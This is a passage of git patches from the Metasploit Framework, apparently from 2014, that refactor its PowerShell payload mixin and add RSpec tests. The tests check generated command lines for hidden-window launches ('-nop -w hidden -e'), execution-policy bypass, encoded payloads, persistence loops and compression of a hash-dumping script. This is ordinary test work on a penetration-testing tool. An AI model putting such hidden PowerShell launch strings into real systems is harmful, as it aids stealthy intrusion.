@@ -147,67 +156,247 @@ describe Msf::Exploit::Powershell do
     end
   end
 
-  describe "::cmd_psh_payload" do
-    it 'should generate a command line with an x86 payload' do
+  describe "::run_hidden_psh" do
 
+
+    let(:encoded) do
+      false
     end
 
-    it 'should generate a command line with an x64 payload' do
+    context 'when x86 payload' do
+      it 'should generate code' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('syswow64').should be_true
+      end
+    end
 
+    context 'when x64 payload' do
+      it 'should generate code'  do
+        code = subject.run_hidden_psh(payload, 'x86_64', encoded)
+        code.include?('sysnative').should be_true
+      end
+    end
+
+    context 'when encoded' do
+      it 'should generate a code including an encoded command' do
+        code = subject.run_hidden_psh(payload, arch, true)
+        code.include?('-nop -w hidden -e ').should be_true
+      end
+    end
+
+    context 'when command' do
+      it 'should generate code including a -c command' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-nop -w hidden -c ').should be_true
+      end
+    end
+
+    context 'when old' do
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a code including unshorted args' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_true
+      end
+    end
+  end
+
+  describe "::cmd_psh_payload" do
+    context 'when payload is huge' do
+      it 'should raise an exception' do
+        except = false
+        begin
+          code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
+        rescue RuntimeError => e
+          except = true
+        end
+
+        except.should be_true
+      end
     end
 
     context 'when persist is true' do
-      it 'should add a persistance loop'
+      before do
+        subject.datastore['Powershell::persist'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_true
       end
     end
 
     context 'when persist is false' do
+      before do
+        subject.datastore['Powershell::persist'] = false
+        subject.options.validate(subject.datastore)
+      end
       it 'shouldnt add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_false
       end
     end
 
     context 'when prepend_sleep is set' do
-      it 'should add a sleep' do
-
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 5
+        subject.options.validate(subject.datastore)
+      end
+      it 'should prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_true
       end
     end
 
     context 'when prepend_sleep isnt set' do
-      it 'shouldnt add a sleep' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = nil
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
+      end
+    end
 
+    context 'when prepend_sleep is 0' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 0
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
       end
     end
 
     context 'when method is old' do
-
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('-namespace Win32Functions').should be_true
+      end
+      it 'shouldnt shorten args' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -Command').should be_true
+      end
+      it 'should include -NoExit' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_true
+      end
     end
 
     context 'when method is net' do
-
+      before do
+        subject.datastore['Powershell::method'] = 'net'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('System.Runtime.InteropServices;').should be_true
+      end
     end
 
     context 'when method is reflection' do
-
+      before do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('GlobalAssemblyCache').should be_true
+      end
     end
 
     context 'when method is msil' do
+      before do
+        subject.datastore['Powershell::method'] = 'msil'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+    end
 
+    context 'when method is unknown' do
+      before do
+        subject.datastore['Powershell::method'] = 'blah'
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+      after do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
     end
 
     context 'when encode_inner_payload' do
+      it 'should contain an inner payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
+          code.include?(' -e ').should be_true
+      end
 
+      context 'when no_equals is true' do
+        it 'should raise an exception' do
+          except = false
+          begin
+            code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
+          rescue RuntimeError
+            except = true
+          end
+          except.should be_true
+        end
+      end
     end
 
     context 'when encode_final_payload' do
-
+      context 'when no_equals is false' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+        end
+      end
+      context 'when no_equals is true' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+          code.include?('=').should be_false
+        end
+      end
     end
 
     context 'when remove_comspec' do
-
+      it 'shouldnt contain %COMSPEC%' do
+        code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
+        code.include?('%COMSPEC%').should be_false
+      end
     end
 
     context 'when use single quotes' do
-
+      it 'should wrap in single quotes' do
+        code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
+        code.include?(' -c \'').should be_true
+      end
     end
   end
 

From 206184007f73d2613594e75d72ab62b0b9d37dd3 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 15:16:15 +0100
Subject: [PATCH 099/321] Move methods and rename file so it is run by rspec

---
 lib/rex/exploitation/powershell.rb            | 47 +++++++++++++++++++
 .../{powershell.rb => powershell_spec.rb}     |  0
 2 files changed, 47 insertions(+)
 rename spec/lib/msf/core/exploit/{powershell.rb => powershell_spec.rb} (100%)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 63cf8be0f6..e7dd429dbb 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -8,6 +8,53 @@ module Exploitation
 
 module Powershell
 
+  #
+  # Reads script into a PowershellScript
+  #
+  # @param script_path [String] Path to the Script File
+  #
+  # @return [PowershellScript] PowerShellScript object
+  def read_script(script_path)
+    return PowershellScript.new(script_path)
+  end
+
+  #
+  # Insert substitutions into the powershell script
+  # If script is a path to a file then read the file
+  # otherwise treat it as the contents of a file
+  #
+  # @param script [String] Script file or path to script
+  # @param subs [Array] Substitutions to insert
+  #
+  # @return [String] Modified script file
+  def make_subs(script, subs)
+    if ::File.file?(script)
+      script = ::File.read(script)
+    end
+
+    subs.each do |set|
+      script.gsub!(set[0],set[1])
+    end
+
+    script
+  end
+
+  #
+  # Return an array of substitutions for use in make_subs
+  #
+  # @param subs [String] A ; seperated list of substitutions
+  #
+  # @return [Array] An array of substitutions
+  def process_subs(subs)
+    return [] if subs.nil? or subs.empty?
+    new_subs = []
+    subs.split(';').each do |set|
+      new_subs << set.split(',', 2)
+    end
+
+    new_subs
+  end
+
   module Output
 
     #
diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
similarity index 100%
rename from spec/lib/msf/core/exploit/powershell.rb
rename to spec/lib/msf/core/exploit/powershell_spec.rb

From 19dd21abaf2cffb0a9bd4bedac86bfec901d5853 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 15:40:03 +0100
Subject: [PATCH 100/321] Remove duplicate methods

---
 lib/msf/core/exploit/powershell.rb | 47 ------------------------------
 1 file changed, 47 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 4a53cd4596..85ceff6fbe 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -25,53 +25,6 @@ module Exploit::Powershell
       ], self.class)
   end
 
-  #
-  # Reads script into a PowershellScript
-  #
-  # @param script_path [String] Path to the Script File
-  #
-  # @return [PowershellScript] PowerShellScript object
-  def read_script(script_path)
-    return PowershellScript.new(script_path)
-  end
-
-  #
-  # Insert substitutions into the powershell script
-  # If script is a path to a file then read the file
-  # otherwise treat it as the contents of a file
-  #
-  # @param script [String] Script file or path to script
-  # @param subs [Array] Substitutions to insert
-  #
-  # @return [String] Modified script file
-  def make_subs(script, subs)
-    if ::File.file?(script)
-      script = ::File.read(script)
-    end
-
-    subs.each do |set|
-      script.gsub!(set[0],set[1])
-    end
-
-    script
-  end
-
-  #
-  # Return an array of substitutions for use in make_subs
-  #
-  # @param subs [String] A ; seperated list of substitutions
-  #
-  # @return [Array] An array of substitutions
-  def process_subs(subs)
-    return [] if subs.nil? or subs.empty?
-    new_subs = []
-    subs.split(';').each do |set|
-      new_subs << set.split(',', 2)
-    end
-
-    new_subs
-  end
-
   #
   # Return an encoded powershell script
   # Will invoke PSH modifiers as enabled

From 5b9ec72395296b2d54f2a53805140d92639f64d2 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 15:40:52 +0100
Subject: [PATCH 101/321] Remove read_script spec

---
 spec/lib/msf/core/exploit/powershell.rb | 477 ++++++++++++++++++++++++
 1 file changed, 477 insertions(+)
 create mode 100644 spec/lib/msf/core/exploit/powershell.rb

diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
new file mode 100644
index 0000000000..7d7d262e8d
--- /dev/null
+++ b/spec/lib/msf/core/exploit/powershell.rb
@@ -0,0 +1,477 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+def decompress(code)
+  Rex::Exploitation::Powershell::Script.new(code).decompress_code
+end
+
+describe Msf::Exploit::Powershell do
+  subject do
+    mod = Msf::Exploit.allocate
+    mod.extend described_class
+    mod.send(:initialize, {})
+    mod.datastore['Verbose'] = true
+    mod
+  end
+
+  let(:example_script) do
+    File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
+  end
+
+  let(:payload) do
+    Rex::Text.rand_text_alpha(120)
+  end
+
+  let(:arch) do
+    'x86'
+  end
+
+  describe "::encode_script" do
+    it 'should read and encode a sample script file' do
+      script = subject.encode_script(example_script)
+      script.should be
+      script.length.should be > 0
+    end
+  end
+
+  describe "::compress_script" do
+    context 'when default datastore is set' do
+      it 'should create a compressed script' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+        compressed.include?('IO.Compression').should be_true
+      end
+
+      it 'should create a compressed script with eof' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script, 'end_of_file')
+        compressed.length.should be < script.length
+      end
+    end
+
+    context 'when strip_comments is true' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+    context 'when strip_comment is false' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is true' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is false' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be script.length
+      end
+    end
+
+    context 'when sub_vars is true' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_false
+      end
+    end
+
+    context 'when sub_vars is false' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_true
+      end
+    end
+
+    context 'when sub_funcs is true' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute functions' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_false
+      end
+    end
+
+    context 'when sub_funcs is false' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_true
+      end
+    end
+  end
+
+  describe "::run_hidden_psh" do
+
+
+    let(:encoded) do
+      false
+    end
+
+    context 'when x86 payload' do
+      it 'should generate code' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('syswow64').should be_true
+      end
+    end
+
+    context 'when x64 payload' do
+      it 'should generate code'  do
+        code = subject.run_hidden_psh(payload, 'x86_64', encoded)
+        code.include?('sysnative').should be_true
+      end
+    end
+
+    context 'when encoded' do
+      it 'should generate a code including an encoded command' do
+        code = subject.run_hidden_psh(payload, arch, true)
+        code.include?('-nop -w hidden -e ').should be_true
+      end
+    end
+
+    context 'when command' do
+      it 'should generate code including a -c command' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-nop -w hidden -c ').should be_true
+      end
+    end
+
+    context 'when old' do
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a code including unshorted args' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_true
+      end
+    end
+  end
+
+  describe "::cmd_psh_payload" do
+    context 'when payload is huge' do
+      it 'should raise an exception' do
+        except = false
+        begin
+          code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
+        rescue RuntimeError => e
+          except = true
+        end
+
+        except.should be_true
+      end
+    end
+
+    context 'when persist is true' do
+      before do
+        subject.datastore['Powershell::persist'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_true
+      end
+    end
+
+    context 'when persist is false' do
+      before do
+        subject.datastore['Powershell::persist'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when prepend_sleep is set' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 5
+        subject.options.validate(subject.datastore)
+      end
+      it 'should prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_true
+      end
+    end
+
+    context 'when prepend_sleep isnt set' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = nil
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when prepend_sleep is 0' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 0
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when method is old' do
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('-namespace Win32Functions').should be_true
+      end
+      it 'shouldnt shorten args' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -Command').should be_true
+      end
+      it 'should include -NoExit' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_true
+      end
+    end
+
+    context 'when method is net' do
+      before do
+        subject.datastore['Powershell::method'] = 'net'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('System.Runtime.InteropServices;').should be_true
+      end
+    end
+
+    context 'when method is reflection' do
+      before do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('GlobalAssemblyCache').should be_true
+      end
+    end
+
+    context 'when method is msil' do
+      before do
+        subject.datastore['Powershell::method'] = 'msil'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+    end
+
+    context 'when method is unknown' do
+      before do
+        subject.datastore['Powershell::method'] = 'blah'
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+      after do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
+    end
+
+    context 'when encode_inner_payload' do
+      it 'should contain an inner payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
+          code.include?(' -e ').should be_true
+      end
+
+      context 'when no_equals is true' do
+        it 'should raise an exception' do
+          except = false
+          begin
+            code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
+          rescue RuntimeError
+            except = true
+          end
+          except.should be_true
+        end
+      end
+    end
+
+    context 'when encode_final_payload' do
+      context 'when no_equals is false' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+        end
+      end
+      context 'when no_equals is true' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+          code.include?('=').should be_false
+        end
+      end
+    end
+
+    context 'when remove_comspec' do
+      it 'shouldnt contain %COMSPEC%' do
+        code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
+        code.include?('%COMSPEC%').should be_false
+      end
+    end
+
+    context 'when use single quotes' do
+      it 'should wrap in single quotes' do
+        code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
+        code.include?(' -c \'').should be_true
+      end
+    end
+  end
+
+  describe "::generate_psh_command_line" do
+    it 'should contain no full stop when :no_full_stop' do
+      opts = {:no_full_stop => true}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell ").should be_true
+    end
+
+    it 'should contain full stop unless :no_full_stop' do
+      opts = {}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+
+      opts = {:no_full_stop => false}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+    end
+
+    it 'should ensure the path should always ends with \\' do
+      opts = {:path => "test"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+
+      opts = {:path => "test\\"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+    end
+  end
+
+  describe "::generate_psh_args" do
+    it 'should return empty string for nil opts' do
+      subject.generate_psh_args(nil).should eql ""
+    end
+
+    command_args = [[:encodedcommand, "parp"],
+                    [:executionpolicy, "bypass"],
+                    [:inputformat, "xml"],
+                    [:file, "x"],
+                    [:noexit, true],
+                    [:nologo, true],
+                    [:noninteractive, true],
+                    [:mta, true],
+                    [:outputformat, 'xml'],
+                    [:sta, true],
+                    [:noprofile, true],
+                    [:windowstyle, "hidden"],
+                    [:command, "Z"]
+    ]
+
+    permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
+
+    permutations.each do |perms|
+      opts = {}
+      perms.each do |k,v|
+        opts[k] = v
+        it "should generate correct arguments for #{opts}" do
+          opts[:shorten] = true
+          short_args = subject.generate_psh_args(opts)
+          opts[:shorten] = false
+          long_args = subject.generate_psh_args(opts)
+
+          opt_length = opts.length - 1
+
+          short_args.should_not be_nil
+          long_args.should_not be_nil
+          short_args.count('-').should eql opt_length
+          long_args.count('-').should eql opt_length
+          short_args[0].should_not eql " "
+          long_args[0].should_not eql " "
+          short_args[-1].should_not eql " "
+          long_args[-1].should_not eql " "
+
+          if opts[:command]
+            long_args[-10..-1].should eql "-Command Z"
+            short_args[-4..-1].should eql "-c Z"
+          end
+       end
+      end
+    end
+  end
+
+end
+

From ae574bec2b15b40812f108800165d11dc6875f03 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 15:42:48 +0100
Subject: [PATCH 102/321] Correct spec

---
 spec/lib/msf/core/exploit/powershell.rb      | 477 -------------------
 spec/lib/msf/core/exploit/powershell_spec.rb |   7 -
 2 files changed, 484 deletions(-)
 delete mode 100644 spec/lib/msf/core/exploit/powershell.rb

diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
deleted file mode 100644
index 7d7d262e8d..0000000000
--- a/spec/lib/msf/core/exploit/powershell.rb
+++ /dev/null
@@ -1,477 +0,0 @@
-# -*- coding:binary -*-
-require 'spec_helper'
-
-require 'msf/core'
-require 'msf/core/exploit/powershell'
-
-def decompress(code)
-  Rex::Exploitation::Powershell::Script.new(code).decompress_code
-end
-
-describe Msf::Exploit::Powershell do
-  subject do
-    mod = Msf::Exploit.allocate
-    mod.extend described_class
-    mod.send(:initialize, {})
-    mod.datastore['Verbose'] = true
-    mod
-  end
-
-  let(:example_script) do
-    File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
-  end
-
-  let(:payload) do
-    Rex::Text.rand_text_alpha(120)
-  end
-
-  let(:arch) do
-    'x86'
-  end
-
-  describe "::encode_script" do
-    it 'should read and encode a sample script file' do
-      script = subject.encode_script(example_script)
-      script.should be
-      script.length.should be > 0
-    end
-  end
-
-  describe "::compress_script" do
-    context 'when default datastore is set' do
-      it 'should create a compressed script' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        compressed.length.should be < script.length
-        compressed.include?('IO.Compression').should be_true
-      end
-
-      it 'should create a compressed script with eof' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script, 'end_of_file')
-        compressed.length.should be < script.length
-      end
-    end
-
-    context 'when strip_comments is true' do
-      before do
-        subject.datastore['Powershell::strip_comments'] = true
-        subject.options.validate(subject.datastore)
-      end
-      it 'should strip comments' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        compressed.length.should be < script.length
-      end
-    end
-    context 'when strip_comment is false' do
-      before do
-        subject.datastore['Powershell::strip_comments'] = false
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt strip comments' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        compressed.length.should be < script.length
-      end
-    end
-
-    context 'when strip_whitespace is true' do
-      before do
-        subject.datastore['Powershell::strip_whitespace'] = true
-        subject.options.validate(subject.datastore)
-      end
-      it 'should strip whitespace' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).length.should be < script.length
-      end
-    end
-
-    context 'when strip_whitespace is false' do
-      before do
-        subject.datastore['Powershell::strip_whitespace'] = false
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt strip whitespace' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).length.should be script.length
-      end
-    end
-
-    context 'when sub_vars is true' do
-      before do
-        subject.datastore['Powershell::sub_vars'] = true
-        subject.options.validate(subject.datastore)
-      end
-      it 'should substitute variables' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).include?('$hashes').should be_false
-      end
-    end
-
-    context 'when sub_vars is false' do
-      before do
-        subject.datastore['Powershell::sub_vars'] = false
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt substitute variables' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).include?('$hashes').should be_true
-      end
-    end
-
-    context 'when sub_funcs is true' do
-      before do
-        subject.datastore['Powershell::sub_funcs'] = true
-        subject.options.validate(subject.datastore)
-      end
-      it 'should substitute functions' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).include?('DumpHashes').should be_false
-      end
-    end
-
-    context 'when sub_funcs is false' do
-      before do
-        subject.datastore['Powershell::sub_funcs'] = false
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt substitute variables' do
-        script = File.read(example_script)
-        compressed = subject.compress_script(script)
-        decompress(compressed).include?('DumpHashes').should be_true
-      end
-    end
-  end
-
-  describe "::run_hidden_psh" do
-
-
-    let(:encoded) do
-      false
-    end
-
-    context 'when x86 payload' do
-      it 'should generate code' do
-        code = subject.run_hidden_psh(payload, arch, encoded)
-        code.include?('syswow64').should be_true
-      end
-    end
-
-    context 'when x64 payload' do
-      it 'should generate code'  do
-        code = subject.run_hidden_psh(payload, 'x86_64', encoded)
-        code.include?('sysnative').should be_true
-      end
-    end
-
-    context 'when encoded' do
-      it 'should generate a code including an encoded command' do
-        code = subject.run_hidden_psh(payload, arch, true)
-        code.include?('-nop -w hidden -e ').should be_true
-      end
-    end
-
-    context 'when command' do
-      it 'should generate code including a -c command' do
-        code = subject.run_hidden_psh(payload, arch, encoded)
-        code.include?('-nop -w hidden -c ').should be_true
-      end
-    end
-
-    context 'when old' do
-      before do
-        subject.datastore['Powershell::method'] = 'old'
-        subject.options.validate(subject.datastore)
-      end
-      it 'should generate a code including unshorted args' do
-        code = subject.run_hidden_psh(payload, arch, encoded)
-        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_true
-      end
-    end
-  end
-
-  describe "::cmd_psh_payload" do
-    context 'when payload is huge' do
-      it 'should raise an exception' do
-        except = false
-        begin
-          code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
-        rescue RuntimeError => e
-          except = true
-        end
-
-        except.should be_true
-      end
-    end
-
-    context 'when persist is true' do
-      before do
-        subject.datastore['Powershell::persist'] = true
-        subject.options.validate(subject.datastore)
-      end
-      it 'should add a persistance loop' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('while(1){Start-Sleep -s ').should be_true
-      end
-    end
-
-    context 'when persist is false' do
-      before do
-        subject.datastore['Powershell::persist'] = false
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt add a persistance loop' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('while(1){Start-Sleep -s ').should be_false
-      end
-    end
-
-    context 'when prepend_sleep is set' do
-      before do
-        subject.datastore['Powershell::prepend_sleep'] = 5
-        subject.options.validate(subject.datastore)
-      end
-      it 'should prepend sleep' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('Start-Sleep -s ').should be_true
-      end
-    end
-
-    context 'when prepend_sleep isnt set' do
-      before do
-        subject.datastore['Powershell::prepend_sleep'] = nil
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt prepend sleep' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('Start-Sleep -s ').should be_false
-      end
-    end
-
-    context 'when prepend_sleep is 0' do
-      before do
-        subject.datastore['Powershell::prepend_sleep'] = 0
-        subject.options.validate(subject.datastore)
-      end
-      it 'shouldnt prepend sleep' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('Start-Sleep -s ').should be_false
-      end
-    end
-
-    context 'when method is old' do
-      before do
-        subject.datastore['Powershell::method'] = 'old'
-        subject.options.validate(subject.datastore)
-      end
-      it 'should generate a command line' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('-namespace Win32Functions').should be_true
-      end
-      it 'shouldnt shorten args' do
-        code = subject.cmd_psh_payload(payload, arch)
-        code.include?('-NoProfile -WindowStyle hidden -Command').should be_true
-      end
-      it 'should include -NoExit' do
-        code = subject.cmd_psh_payload(payload, arch)
